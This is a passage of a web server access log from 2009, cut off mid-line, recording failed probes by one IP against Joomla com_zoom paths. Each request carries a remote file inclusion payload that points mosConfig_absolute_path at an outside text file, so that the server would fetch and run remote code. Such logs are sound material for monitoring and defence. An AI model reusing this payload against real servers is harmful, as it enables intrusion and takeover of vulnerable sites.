110.45.146.152 - - [09/Nov/2009:06:38:09 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [09/Nov/2009:06:38:09 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [09/Nov/2009:06:38:09 -0800] "GET /logs//components/com_zoom/in